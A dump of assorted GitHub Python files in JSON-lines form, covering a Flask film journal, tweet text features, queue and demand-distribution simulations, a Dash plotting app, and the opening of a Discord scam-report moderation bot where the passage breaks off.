+{"seq_id":"769624195","text":"from flask import Blueprint, request, render_template, redirect, url_for, flash\nfrom flask_login import login_user, logout_user, login_required, current_user\nfrom datetime import date, datetime\nfrom film_app.models import Film, List, Entry, User\nfrom film_app.main.forms import FilmForm, ListForm, EntryForm\nfrom film_app.extensions import app, db, bcrypt\n\nmain = Blueprint(\"main\", __name__)\n\n@main.route('/')\ndef homepage():\n all_films = Film.query.all()\n all_users = User.query.all()\n return render_template('home.html',\n all_films=all_films, all_users=all_users)\n\n@main.route('/create_film', methods=['GET', 'POST'])\n@login_required\ndef create_film():\n form = FilmForm()\n\n if form.validate_on_submit(): \n new_film = Film(\n title=form.title.data,\n watched_date=form.watched_date.data,\n list=form.list.data,\n genre=form.genre.data,\n entries=form.entries.data\n )\n db.session.add(new_film)\n db.session.commit()\n\n flash('New film was created successfully.')\n return redirect(url_for('main.film_detail', film_id=new_film.id))\n return render_template('create_film.html', form=form)\n\n@main.route('/create_list', methods=['GET', 'POST'])\n@login_required\ndef create_list():\n form = ListForm()\n if form.validate_on_submit():\n new_list = List(\n name=form.name.data,\n description=form.description.data\n )\n db.session.add(new_list)\n db.session.commit()\n\n flash('New list created successfully.')\n return redirect(url_for('main.homepage'))\n \n return render_template('create_list.html', form=form)\n\n@main.route('/create_entry', methods=['GET', 'POST'])\n@login_required\ndef create_entry():\n form = EntryForm()\n if form.validate_on_submit():\n new_entry = Entry(\n name=form.name.data\n )\n db.session.add(new_entry)\n db.session.commit()\n\n flash('New entry created successfully.')\n return redirect(url_for('main.homepage'))\n \n return render_template('create_entry.html', form=form)\n\n@main.route('/film/', methods=['GET', 'POST'])\ndef film_detail(film_id):\n film = Film.query.get(film_id)\n form = FilmForm(obj=film)\n \n if form.validate_on_submit():\n film.title = form.title.data\n film.watched_date = form.watched_date.data\n film.list = form.list.data\n film.genre = form.genre.data\n film.entries = form.entries.data\n\n db.session.commit()\n\n flash('Film was updated successfully.')\n return redirect(url_for('main.film_detail', film_id=film_id))\n\n return render_template('film_detail.html', film=film, form=form)\n\n@main.route('/profile/')\ndef profile(username):\n user = User.query.filter_by(username=username).one()\n return render_template('profile.html', user=user)\n\n@main.route('/favorite/', methods=['POST'])\n@login_required\ndef favorite_film(film_id):\n film = Film.query.get(film_id)\n if film in current_user.favorite_films:\n flash('Film already in favorites.')\n else:\n current_user.favorite_films.append(film)\n db.session.add(current_user)\n db.session.commit()\n flash('Film added to favorites.')\n return redirect(url_for('main.film_detail', film_id=film_id))\n\n@main.route('/unfavorite/', methods=['POST'])\n@login_required\ndef unfavorite_film(film_id):\n film = Film.query.get(film_id)\n if film not in current_user.favorite_films:\n flash('Film not in favorites.')\n else:\n current_user.favorite_films.remove(film)\n db.session.add(current_user)\n db.session.commit()\n flash('Film removed from favorites.')\n return redirect(url_for('main.film_detail', film_id=film_id))\n\n@main.route('/watchlist/', methods=['POST'])\n@login_required\ndef watch_film(film_id):\n film = Film.query.get(film_id)\n if film in current_user.watchlist_films:\n flash('Film already in watchlist.')\n else:\n current_user.watchlist_films.append(film)\n db.session.add(current_user)\n db.session.commit()\n flash('Film added to watchlist.')\n return redirect(url_for('main.film_detail', film_id=film_id))\n\n@main.route('/unwatchlist/', methods=['POST'])\n@login_required\ndef unwatchlist_film(film_id):\n film = Film.query.get(film_id)\n if film not in current_user.watchlist_films:\n flash('Film not in watchlist')\n else:\n current_user.watchlist_films.remove(film)\n db.session.add(current_user)\n db.session.commit()\n flash('Film removed from watchlist.')\n return redirect(url_for('main.film_detail', film_id=film_id))","repo_name":"sharmaineb/film-journal","sub_path":"film_app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"40079336562","text":"import os\nimport enchant\nimport dataset.dataset_reader as dr\nfrom features.feature import Feature\nfrom features.feature_storage import FeatureWithStorage\nfrom Levenshtein.StringMatcher import StringMatcher\n\n# Levensthein word distance ratio threshold\nWORD_DIST_RATIO = 0.6\nBRANDS_FILE = './additional/brands.txt'\n\n\nclass OutOfDictWordsFeature(Feature):\n def __init__(self):\n self.brands = None\n self.dir = os.path.dirname(__file__)\n # dictionary with english words\n self.d = enchant.Dict(\"en_US\")\n # dictionary with spanish words (because they may occur in english tweets)\n self.d_sp = enchant.Dict(\"es\")\n # Tool for calculating Levenshtein word distance\n self.sm = StringMatcher()\n # load brands\n self.brands = set(line.lower().strip() for line in open(os.path.join(self.dir, BRANDS_FILE)))\n\n def extract_feature(self, user_id, tweets):\n # List with out of dictionary words\n out_of_dict_words = set()\n # List with words in dictionary\n in_dict_words = set()\n for tweet in tweets:\n for word in tweet:\n if word.replace('\\'', '').replace('-', '').isalpha() and not self.d.check(\n word) and not self.d_sp.check(word) and (word not in self.brands) and ('URL' not in word) and (\n 'NUMBER' not in word):\n self.sm.set_seq1(seq1=word)\n founded = False\n for suggestion in self.d.suggest(word):\n self.sm.set_seq2(seq2=suggestion)\n if self.sm.ratio() > WORD_DIST_RATIO:\n out_of_dict_words.add(word)\n founded = True\n break\n if not founded:\n in_dict_words.add(word)\n else:\n in_dict_words.add(word)\n #return len(out_of_dict_words), len(out_of_dict_words) + len(in_dict_words)\n if len(out_of_dict_words) + len(in_dict_words) > 0:\n return len(out_of_dict_words) / (len(out_of_dict_words) + len(in_dict_words))\n else:\n return 0\n\n#tweets = dr.load_dataset()\n#o1 = OutOfDictWordsFeature()\n#print(type(o1).__name__)\n#odwf = FeatureWithStorage(OutOfDictWordsFeature(), 'abc.shelve')\n# for user in tweets:\n# print(user)\n# print(odwf.extract_feature('36b2593435e1bed13eb138c1973c13ed', tweets['36b2593435e1bed13eb138c1973c13ed'].tweets))\n# break\n","repo_name":"mgluhak/TAR-Project","sub_path":"features/out_of_dict_words_feature.py","file_name":"out_of_dict_words_feature.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"17324708079","text":"from numaleatorios import Aleatorio\r\nimport math\r\nimport statistics\r\nfrom scipy.stats import expon\r\nimport numpy as np\r\n\r\n# prueba = np.random.exponential(8)\r\n# print(prueba)\r\n\r\nrandom = Aleatorio()\r\n\r\nclass Evento():\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.tipo_evento = \"\"\r\n self.tiempo_creacion = 0\r\n self.tiempo_salida = 0\r\n \r\n#Simulacion en minutos\r\n\r\n## Creacion de llegadas\r\ntiempo = 0\r\n# SIMULACION POR 80 HORAS, EN MINUTOS = 4800\r\ntiempo_max = 4800\r\n# LISTA DONDE SE VAN A GUARDAR TODOS LOS EVENTOS\r\neventos = []\r\n# CICLO PARA LAS LLEGADAS DE LOS CLIENTES RAPIDOS\r\nwhile(tiempo < tiempo_max):\r\n evento = Evento()\r\n # tiempo = tiempo + random.exponencial(8) #TIEMPO DE LLEGADA EXPONENCIAL CON MEDIA DE 8 MINUTOS\r\n tiempo = tiempo + np.random.exponential(8) #TIEMPO DE LLEGADA EXPONENCIAL CON MEDIA DE 8 MINUTOS\r\n evento.tiempo_creacion = tiempo \r\n evento.tiempo_evento = evento.tiempo_creacion\r\n evento.tipo_evento = \"llegada_rapida\"\r\n eventos.append(evento)\r\n\r\ntiempo = 0\r\n \r\n# CICLO PARA LAS LLEGADAS DE LOS CLIENTES LENTOS\r\nwhile(tiempo < tiempo_max):\r\n evento = Evento()\r\n # tiempo = tiempo + random.exponencial(20) #TIEMPO DE LLEGADA EXPONENCIAL CON MEDIA DE 20 MINUTOS\r\n tiempo = tiempo + np.random.exponential(20) #TIEMPO DE LLEGADA EXPONENCIAL CON MEDIA DE 20 MINUTOS\r\n evento.tiempo_creacion = tiempo \r\n evento.tiempo_evento = evento.tiempo_creacion\r\n evento.tipo_evento = \"llegada_lenta\"\r\n eventos.append(evento)\r\n \r\ntiempo = 0 \r\n# CICLO PARA EL ESCANER\r\nwhile(tiempo < tiempo_max):\r\n evento = Evento()\r\n tiempo = tiempo + 1 #AGREGAMOS 1 MINUTO A EL ESCANER PARA CHECAR CADA 1 MINUTO\r\n evento.tiempo_creacion = tiempo \r\n evento.tiempo_evento = evento.tiempo_creacion\r\n evento.tipo_evento = \"escaner\"\r\n eventos.append(evento)\r\n\r\n## Inicio de la simulacion \r\ntiempo = 0\r\ncola_de_espera_Rapida = []\r\ncola_de_espera_Lenta = []\r\nsalidas = []\r\ncajera_caja_rapida_ocupada = False\r\ncajera_caja_lenta_ocupada = False\r\nlistaClientesEnColaDeEsperaRapida = []\r\nlistaClientesEnColaDeEsperaLenta = []\r\n# piezas_max = 0\r\n\r\n# SIMULACIÓN PARA LA CAJA RÁPIDA\r\nwhile(tiempo < tiempo_max):\r\n eventos.sort(key=lambda x:x.tiempo_evento)\r\n evento = eventos.pop(0) ## Evento proximo\r\n tiempo = evento.tiempo_evento\r\n \r\n if(evento.tipo_evento==\"escaner\"):\r\n listaClientesEnColaDeEsperaRapida.append(len(cola_de_espera_Rapida))\r\n listaClientesEnColaDeEsperaLenta.append(len(cola_de_espera_Lenta))\r\n \r\n if(evento.tipo_evento == \"llegada_rapida\"):\r\n if(len(cola_de_espera_Rapida) == 0 and cajera_caja_rapida_ocupada == False):\r\n cajera_caja_rapida_ocupada = True\r\n evento.tiempo_inspeccion = tiempo\r\n evento.tiempo_evento = tiempo + np.random.exponential(2) ##TIEMPO EN QUE ATIENDEN EN LA CAJA RÁPIDA\r\n evento.prevEvento = evento.tipo_evento\r\n evento.tipo_evento =\"salida_atendido_rapido\"\r\n evento.tiempo_salida_rapido = evento.tiempo_evento\r\n eventos.append(evento)\r\n #AGREGAR QUE HAY 0 PERSONAS EN LA COLA\r\n # listaClientesEnColaDeEsperaRapida.append(len(cola_de_espera_Rapida))\r\n else:\r\n cola_de_espera_Rapida.append(evento)\r\n # listaClientesEnColaDeEsperaRapida.append(len(cola_de_espera_Rapida)) #AQUI SE AGREGA A UNA LISTA LA CANTIDAD DE CLIENTES EN LA COLA DE ESPERA\r\n \r\n \r\n \r\n \r\n elif( evento.tipo_evento == \"salida_atendido_rapido\"):\r\n cajera_caja_rapida_ocupada = False\r\n evento.tiempo_salida_rapido = tiempo\r\n salidas.append(evento)\r\n if(len(cola_de_espera_Rapida)>0):\r\n pieza = cola_de_espera_Rapida.pop(0)\r\n cajera_caja_rapida_ocupada = True\r\n pieza.tiempo_inspeccion = tiempo\r\n pieza.tiempo_evento = tiempo + np.random.exponential(2) ##TIEMPO EN QUE ATIENDEN EN LA CAJA RAPIDA \r\n pieza.tiempo_salida = pieza.tiempo_evento\r\n pieza.prevEvento = pieza.tipo_evento\r\n pieza.tipo_evento =\"salida_atendido_rapido\"\r\n eventos.append(pieza)\r\n # listaClientesEnColaDeEsperaRapida.append(len(cola_de_espera_Rapida)) #AQUI SE AGREGA A UNA LISTA LA CANTIDAD DE CLIENTES EN LA COLA DE ESPERA\r\n \r\n \r\n \r\n elif(evento.tipo_evento == \"llegada_lenta\"):\r\n if(len(cola_de_espera_Lenta) == 0 and cajera_caja_lenta_ocupada == False):\r\n cajera_caja_lenta_ocupada = True\r\n evento.tiempo_inspeccion = tiempo\r\n evento.tiempo_evento = tiempo + np.random.exponential(16.4) ##TIEMPO EN QUE ATIENDEN EN LA CAJA RÁPIDA\r\n evento.prevEvento = evento.tipo_evento\r\n evento.tipo_evento =\"salida_atendido_lento\"\r\n evento.tiempo_salida_lento = evento.tiempo_evento\r\n eventos.append(evento)\r\n #AGREGAR QUE HAY 0 PERSONAS EN LA COLA\r\n # listaClientesEnColaDeEsperaLenta.append(len(cola_de_espera_Lenta))\r\n else:\r\n cola_de_espera_Lenta.append(evento)\r\n # listaClientesEnColaDeEsperaLenta.append(len(cola_de_espera_Lenta)) #AQUI SE AGREGA A UNA LISTA LA CANTIDAD DE CLIENTES EN LA COLA DE ESPERA\r\n \r\n elif( evento.tipo_evento == \"salida_atendido_lento\"):\r\n cajera_caja_lenta_ocupada = False\r\n evento.tiempo_salida_lento = tiempo\r\n salidas.append(evento)\r\n if(len(cola_de_espera_Lenta)>0):\r\n pieza = cola_de_espera_Lenta.pop(0)\r\n cajera_caja_lenta_ocupada = True\r\n pieza.tiempo_inspeccion = tiempo\r\n pieza.tiempo_evento = tiempo + np.random.exponential(16.4) ##TIEMPO EN QUE ATIENDEN EN LA CAJA LENTA \r\n pieza.tiempo_salida = pieza.tiempo_evento\r\n pieza.prevEvento = pieza.tipo_evento\r\n pieza.tipo_evento =\"salida_atendido_lento\"\r\n eventos.append(pieza)\r\n # listaClientesEnColaDeEsperaLenta.append(len(cola_de_espera_Lenta)) #AQUI SE AGREGA A UNA LISTA LA CANTIDAD DE CLIENTES EN LA COLA DE ESPERA\r\n \r\n\r\n\r\n\r\n# for x in listaClientesEnColaDeEsperaRapida:\r\n# print ( x )\r\n \r\n \r\n# print(\"separacion\")\r\n\r\n# for x in listaClientesEnColaDeEsperaLenta:\r\n# print ( x )\r\n\r\n\r\ndef promediarLista(lista):\r\n sum=0.0\r\n for i in range(0,len(lista)):\r\n sum=sum+lista[i]\r\n \r\n return sum/len(lista)\r\n\r\npromedio1 = promediarLista(listaClientesEnColaDeEsperaRapida)\r\n\r\npromedio2 = promediarLista(listaClientesEnColaDeEsperaLenta)\r\n\r\n# promedio1 = mean(listaClientesEnColaDeEsperaRapida)\r\n\r\n# print (promedio1)\r\n\r\n# print (promedio2)\r\nprint(\"Promedio de clientes en cola rápida: \")\r\nprint(statistics.mean(listaClientesEnColaDeEsperaRapida)) #Utilizando el método que me comentó el profe\r\nprint(\"Promedio de clientes en cola lenta: \")\r\nprint(statistics.mean(listaClientesEnColaDeEsperaLenta)) #Utilizando el método que me comentó el profe\r\n\r\n\r\n","repo_name":"LuisArzola21041999/ProModelPython","sub_path":"proyecto.py","file_name":"proyecto.py","file_ext":"py","file_size_in_byte":7001,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"18111664896","text":"# Find common linguistic patterns\n# in Donald Trump Tweets\n\n# Get the contents of the file\n# Delimit by spaces and grab the last element\nf = open('./trump_tweets_pos.txt', 'r')\n\n# Make a list of pos\npos_lines = []\n\n# make a list of pos in tweets\ntweet_patterns = []\n\n# Make a dictionary with the pos as the key and the item\n# as a list of words associated with the pos\nwords = dict()\nisfound = False\n\n# Loop through all of the pos data\nfor pos in f:\n # print(\"i:\", i, \",\", pos)\n # Delimit the line by space\n line_split = pos.split(\" \")\n # Get the word\n word = line_split[0].lower()\n # Get the pos\n part_of_speech = line_split[-1].replace(\"\\n\", \"\")\n # Determine if the part of speech is a key in the dictionary\n # see if the word exists in the dictionary and the word is\n # not a link or @ or #\n if part_of_speech in words \\\n and not word.__contains__(\".*:\\/\\/.*\") \\\n and not word.__contains__(\".*\\..*\\..*\\/.*\") \\\n and not word.__contains__(\".*@.*\\..*\")\\\n and not word.__contains__(\"@\")\\\n and not word.__contains__(\"#\")\\\n and not word.__contains__(\"[\\+]?[\\d]*[\\.|\\-]?[(]?[\\d]{3}[)]?[\\.|\\-]*[\\d]{3}[\\.|\\-]*[\\d]{4}\"):\n for j, tup in enumerate(words[part_of_speech]):\n if word == tup[0]:\n words[part_of_speech][j] = (word, tup[1] + 1)\n isfound = True\n break\n else:\n isfound = False\n\n if not isfound:\n words[part_of_speech].append((word, 1))\n isfound = False\n\n else:\n if not word.__contains__(\".*:\\/\\/.*\") \\\n and not word.__contains__(\".*\\..*\\..*\\/.*\") \\\n and not word.__contains__(\".*@.*\\..*\")\\\n and not word.__contains__(\"@\") \\\n and not word.__contains__(\"#\") \\\n and not word.__contains__(\"[\\+]?[\\d]*[\\.|\\-]?[(]?[\\d]{3}[)]?[\\.|\\-]*[\\d]{3}[\\.|\\-]*[\\d]{4}\"):\n words[part_of_speech] = [(word, 1)]\n pos_lines.append(part_of_speech)\n\n\n# Make a temporary list to hold individual tweet patterns\ntemp = []\nfor p in pos_lines:\n\n # See if the tweet ended\n if p == \".\":\n # add the tween pattern to the list\n tweet_patterns.append(temp)\n # clear the temporary list\n temp = []\n else:\n temp.append(p)\n\n# print(pos_lines)\n# print(\"Tweet Patterns: \", tweet_patterns)\n# print('\\n')\n# print(words)\n\n\nbigram_pos_counts = dict()\n\nfor tweet in tweet_patterns:\n for i in range(len(tweet)-1):\n bigram_pos = (tweet[i], tweet[i+1])\n if bigram_pos in bigram_pos_counts:\n bigram_pos_counts[bigram_pos] += 1\n else:\n bigram_pos_counts[bigram_pos] = 1\n\nprint()\nprint(bigram_pos_counts)\nf.close()\n\nfor pos in words:\n words[pos].sort(key=lambda e: -e[1])\n\nf = open('trump-pos-corpus.txt', 'w')\n\nfor pos in words:\n f.write(pos + \":\" + str(words[pos]) + '\\n\\n')\n\nf.close()\nprint('done')\n\n","repo_name":"SandeepJala94/HackUMass2017","sub_path":"py/copy-POS_Parser.py","file_name":"copy-POS_Parser.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"39753123853","text":"import dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\nfrom app import app\n\nimport plotly.graph_objs as go\nimport pandas as pd\nimport re\n\n\nparameters = dict()\nparameters['ngenes'] = 3\nparameters['colours'] = 7\nparameters['metric_colours'] = 9\nparameters['builds'] = 10\nparameters['njiggle'] = 100\nparameters['threshold'] = 50\n\nfilepath = 'http://files.tcm.phy.cam.ac.uk/~vatj2/Polyominoes/data/gpmap/V5/meeting/'\nset_filename = 'SetMetrics_N{ngenes}_C{colours}_T{threshold}_B{builds}_Cx{metric_colours}_J{njiggle}_Iso.txt'.format(**parameters)\nset_names = ['srobustness', 'interrobustness', 'evolvability', 'rare', 'loop', 'analysed', 'total_neutral', 'diversity', 'pIDs']\n\ndf_ref1 = pd.read_csv(filepath + set_filename, sep=\" \", header=None, names=set_names)\n\nset_filename = 'SetMetrics2_N{ngenes}_C{colours}_T{threshold}_B{builds}_Cx{metric_colours}_J{njiggle}_Iso.txt'.format(**parameters)\n\ndf_ref2 = pd.read_csv(filepath + set_filename, sep=\" \", header=None, names=set_names)\n\ndf_ref1['evo'] = df_ref1['evolvability'] - df_ref1['rare'] - df_ref1['loop']\ndf_ref2['evo'] = df_ref2['evolvability'] - df_ref2['rare'] - df_ref2['loop']\nset_names.insert(3, 'evo')\n\n\nlayout = html.Div(children=[\n html.H3(children='Reproducibility'),\n dcc.Dropdown(id='dropdown-reproducibility-x',\n value=set_names[0],\n options=[{'label': i, 'value': i} for i in set_names[:-1]],\n multi=False, placeholder='x-axis, ' + set_names[0]),\n dcc.Dropdown(id='dropdown-reproducibility-y',\n value=set_names[1],\n options=[{'label': i, 'value': i} for i in set_names[:-1]],\n multi=False, placeholder='y-axis, ' + set_names[1]),\n dcc.Graph(id='graph-container-reproducibility-set')\n], className=\"content\")\n\n\n@app.callback(\n Output('graph-container-reproducibility-set', 'figure'),\n [Input('dropdown-reproducibility-x', 'value'),\n Input('dropdown-reproducibility-y', 'value')])\ndef update_figure(dropdown_x, dropdown_y):\n if dropdown_x is None:\n xaxis = set_names[0]\n else:\n xaxis = dropdown_x\n if dropdown_y is None:\n yaxis = set_names[1]\n else:\n yaxis = dropdown_y\n\n traces = []\n\n traces.append(go.Scatter(\n x=df_ref1[xaxis], y=df_ref1[yaxis], text=df_ref1.pIDs, mode='markers'))\n traces.append(go.Scatter(\n x=df_ref2[xaxis], y=df_ref2[yaxis], text=df_ref2.pIDs, mode='markers'))\n\n return {'data' : traces,\n 'layout': go.Layout(\n xaxis={'title' : xaxis}, yaxis={'title' : yaxis},\n hovermode='closest')}\n","repo_name":"vatj/DashPolyomino","sub_path":"apps/app_reproducibility_scatter.py","file_name":"app_reproducibility_scatter.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"13680791045","text":"#!/usr/bin/python3\n\n#importando los paquetes\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport scipy.stats as spsts\nimport datetime\nfrom scipy import stats\nimport tikzplotlib as tikz\n\n\n#=================================FUNCIONES==================================\ndef acondicionar_datos(json, tiempo):\n\tdf = pd.read_json(json) #se carga el frame de datos\n\tdf = np.array(df) #se convierte el frame en un array\n\t\n\t#se extraen las fechas y las demandas en arreglos separados\n\tmuestras = len(df)\n\tvector_fecha = []; demanda = []\n\tfor datos in range(muestras):\n\t\t\n\t\thora = df[datos][0]['fechaHora']\n\t\tif int(hora[11:13]) == tiempo:\n\t\t\tdemanda.append(df[datos][0]['MW'])\n\t\n\treturn demanda\n\t\t\n#===============================================================================\ndef evaluar_modelos(datos, dists, Bins, hora):\n\t#condiciones iniciales\n\trmse_min = np.inf\n\tp_max = 0 #El mejor p en chisqr test\n\tkspmax = 0 #El mejor p en KStest\n\tnp.seterr(all = 'ignore')\n\n\t#Se prepara el espacio de visualizacion:\n\tfig, ax = plt.subplots(1, 3, figsize = (16, 5), tight_layout = True)\n\t#fig1:\n\tax[0].set_title('Distribución observada: demanda a las {}'.format(datetime.time(hora)))\n\tax[0].set_xlabel('Potencia [MW]')\n\tax[0].set_ylabel('Frecuencia')\n\t#fig2:\n\tax[1].set_title('Ajuste por funciones de densidad')\n\tax[1].set_ylabel('Frecuencia')\n\tax[1].set_xlabel('Potencia [MW]')\n\t#fig3:\n\tax[2].set_title('Mejor ajuste basado en criterios de bondad')\n\tax[2].set_ylabel('Frecuencia')\n\tax[2].set_xlabel('Potencia [MW]')\n\t\n\t#Distribucion observada:\n\tocurrencias_exp, bins = np.histogram(datos, bins = Bins)\n\tfor i in range(Bins):\n\t\tif ocurrencias_exp[i] == 0:\n\t\t\tocurrencias_exp[i] = 1\n\n\tbins_centrados = (bins + np.roll(bins, -1))[:-1] / 2.0 \n\tescala = len(datos) * (max(datos) - min(datos)) / len(bins_centrados)\n\t\n\t#Probando las distribuciones ingresadas\n\tfor distribucion in dists:\n\t\tdist = getattr(spsts, distribucion)\n\t\tparam = dist.fit(datos)\n\t\tpdf = dist.pdf(bins_centrados, *param)\n\t\tpdf_plot = dist.pdf(np.arange(min(datos) * 0.96, max(datos) * 1.04, 1), *param)\n\t\tocurrencias_teo = [int(round(freq)) for freq in escala * pdf]\n\t\tax[1].plot(np.arange(min(datos) * 0.96, max(datos) * 1.04, 1), escala * pdf_plot, lw = 3.5, label = '{}'.format(distribucion))\n\t\t\n\t\t#Bondad de ajuste por chisquare:\n\t\tcoef_chi, p = spsts.chisquare(f_obs = ocurrencias_teo, f_exp = ocurrencias_exp)\n\t\tif p > p_max:\n\t\t\tp_max = p\n\t\t\tdist_chi = distribucion\n\t\t\tmod_chi = dist, param, pdf\n\t\t\n\t\t#Bondad de ajuste por RMSE(Root-Mean-Square Error):\n\t\tdiferencia = (ocurrencias_teo - ocurrencias_exp)**2\n\t\trmse = np.sqrt(np.mean(diferencia))\n\t\tif rmse < rmse_min:\n\t\t\trmse_min = rmse\n\t\t\tdist_rmse = distribucion\n\t\t\tmod_rmse = dist, param, pdf\n\t\n\t\t#Bondad de ajuste por Kolvogorov-Smirnov:\n\t\tD, ksp = spsts.kstest(datos, distribucion, args = param)\n\t\tif ksp > kspmax:\n\t\t\tkspmax = ksp\n\t\t\tdist_ks = distribucion\n\n\t#visualizando resultados:\n\tax[0].hist(datos, bins = Bins, color = 'tomato', histtype='bar', rwidth=0.8)\n\tax[1].hist(datos, bins = Bins, color = 'palevioletred', histtype='bar', rwidth=0.8)\n\tax[2].hist(datos, bins = Bins, color = 'b')\n\t\t\n\tif dist_chi == dist_rmse or dist_chi == dist_ks:\n\t\tparams = mod_chi[1]\n\t\tmejor_ajuste = dist_chi\n\t\tax[2].hist(datos, bins = Bins, color = 'cornflowerblue', label = 'Distribución observada')\n\t\tax[2].bar(bins_centrados, mod_chi[2] * escala, width = 6, color = 'r', label = 'Mejor ajuste: {}'.format(dist_chi))\n\t\tm, v, s, k = mod_chi[0].stats(*params, moments = 'mvsk') \n\t\t\n\telif dist_rmse == dist_ks:\n\t\tparams = mod_rmse[1]\n\t\tmejor_ajuste = dist_rmse\n\t\tax[2].hist(datos, bins = Bins, color = 'cornflowerblue', label = 'Distribución observada')\t\n\t\tax[2].bar(bins_centrados, mod_rmse[2] * escala, width = 6, color = 'r', label = 'Mejor ajuste: {}'.format(dist_rmse))\n\t\tm, v, s, k = mod_rmse[0].stats(*params, moments = 'mvsk')\n\t\t\n\t\t\n\t\t\n\t#imprimiendo resumen y resultados:\n\n\tprint('Resumen:\\nEl mejor ajuste por RMSE ocurre con la distribución', dist_rmse)\n\tprint('El mejor ajuste por chisquare ocurre con la distribución', dist_chi)\n\tprint('El mejor ajuste por Kolmogorov ocurre con la distribución', dist_ks)\n\tprint('Mejor modelo ajustada por criterios de bondad:', mejor_ajuste)\n\tprint('Cantidad de muestras:', len(datos))\t\n\tprint('.\\n.\\n.\\n.\\nMomentos centrales para el mejor ajuste:', '\\nMedia:', m, '\\nVarianza:', v, '\\nCoef. Simetría:', s, '\\nCurtosis:', k)\n\tax[1].legend()\n\tax[2].legend()\n\tplt.show()\n\t\n#================================================================================================\n\n\ndistribuciones = ['norm', 'rayleigh', 'expon', 'uniform', 'burr12', 'alpha', 'gamma', 'beta', 'pareto']\nhora = 3\ndemandas = acondicionar_datos('demanda_2019.json', hora)\nmodelo = evaluar_modelos(demandas, distribuciones, 15, hora)\n\n\n\n\n\n\n\n\n","repo_name":"JeaustinSirias/Simulacion_de_aplicaciones_teoria_probabilidad_ing_electrica","sub_path":"misc/P2/scr/source_code.py","file_name":"source_code.py","file_ext":"py","file_size_in_byte":4785,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"4272734012","text":"# bot.py\r\nimport discord\r\nfrom discord.ext import commands\r\nimport os\r\nimport json\r\nimport logging\r\nimport re\r\nfrom report import Report\r\nfrom database import Database\r\nfrom unidecode import unidecode \r\n\r\n# Set up logging to the console\r\nlogger = logging.getLogger('discord')\r\nlogger.setLevel(logging.DEBUG)\r\nhandler = logging.FileHandler(filename='discord.log', encoding='utf-8', mode='w')\r\nhandler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))\r\nlogger.addHandler(handler)\r\n\r\n# There should be a file called 'token.json' inside the same folder as this file\r\ntoken_path = 'tokens.json'\r\nif not os.path.isfile(token_path):\r\n raise Exception(f\"{token_path} not found!\")\r\nwith open(token_path) as f:\r\n # If you get an error here, it means your token is formatted incorrectly. Did you put it in quotes?\r\n tokens = json.load(f)\r\n discord_token = tokens['discord']\r\n perspective_key = tokens['perspective']\r\n\r\n\r\nclass ModBot(discord.Client):\r\n def __init__(self, key):\r\n intents = discord.Intents.default()\r\n super().__init__(command_prefix='.', intents=intents)\r\n self.group_num = None \r\n self.group_channel = None # Main group channel\r\n self.mod_channels = {} # Map from guild to the mod channel id for that guild\r\n self.reports = {} # Map from user IDs to the state of their report\r\n self.reported = {} # Map from message IDs to boolean to forward\r\n self.perspective_key = key\r\n self.db = Database()\r\n\r\n async def on_ready(self):\r\n\r\n print(f'{self.user.name} has connected to Discord! It is these guilds:')\r\n for guild in self.guilds:\r\n print(f' - {guild.name}')\r\n print('Press Ctrl-C to quit.')\r\n\r\n # Parse the group number out of the bot's name\r\n match = re.search('[gG]roup (\\d+) [bB]ot', self.user.name)\r\n if match:\r\n self.group_num = match.group(1)\r\n else:\r\n raise Exception(\"Group number not found in bot's name. Name format should be \\\"Group # Bot\\\".\")\r\n \r\n # Find the mod channel in each guild that this bot should report to\r\n for guild in self.guilds:\r\n for channel in guild.text_channels:\r\n if channel.name == f'group-{self.group_num}':\r\n self.group_channel = channel\r\n if channel.name == f'group-{self.group_num}-mod':\r\n self.mod_channels[guild.id] = channel\r\n\r\n async def on_raw_reaction_add(self, payload):\r\n '''\r\n This function is called whenever a user reacts to a message in a channel that the bot can see.\r\n Currently the bot is configured to send a message describing the action taken to the \"group-#-mod\" channel.\r\n '''\r\n if payload.guild_id not in self.mod_channels:\r\n return\r\n if payload.channel_id != self.mod_channels[payload.guild_id].id:\r\n return\r\n mod_channel = self.mod_channels[payload.guild_id]\r\n message = await mod_channel.fetch_message(payload.message_id)\r\n \r\n # Make sure it's a report forwarded by the bot\r\n if message.reference is not None or message.author.id != self.user.id:\r\n return\r\n\r\n # Get message ID from forwarded report content\r\n original_message_ID = int(message.content.split(' ')[4])\r\n original_message = None\r\n try:\r\n original_message = await self.group_channel.fetch_message(original_message_ID)\r\n except:\r\n return\r\n\r\n if payload.emoji.name == '👍':\r\n r = (f\"Sufficient public indication that Tweet is a scam according to {payload.member.name}. \"\r\n \"Applying warning to Tweet. \"\r\n \"Please reply to this message with a content reviewer report. \"\r\n )\r\n prompt = await message.reply(r)\r\n # Marks as requiring content review report\r\n self.db.add_prompt(prompt.id, original_message_ID)\r\n await original_message.reply('Warning: Tweet has been confirmed to be a scam by the content moderation team.')\r\n elif payload.emoji.name == '👎':\r\n r = (f\"Insufficient public indication that Tweet is a scam according to {payload.member.name}. \"\r\n \"Applying warning to Tweet. \"\r\n )\r\n await message.reply(r)\r\n self.db.add_not_severe(original_message_ID)\r\n await original_message.reply('Warning: Tweet has been reported by users as a scam.')\r\n elif payload.emoji.name == '❌':\r\n await original_message.delete()\r\n r = (f\"Previous content reviewer reports suggest Tweet should be deleted according to {payload.member.name}. \"\r\n \"Deleting Tweet.\"\r\n )\r\n await message.reply(r)\r\n \r\n async def on_message(self, message):\r\n '''\r\n This function is called whenever a message is sent in a channel that the bot can see (including DMs). \r\n Currently the bot is configured to only handle messages that are sent over DMs 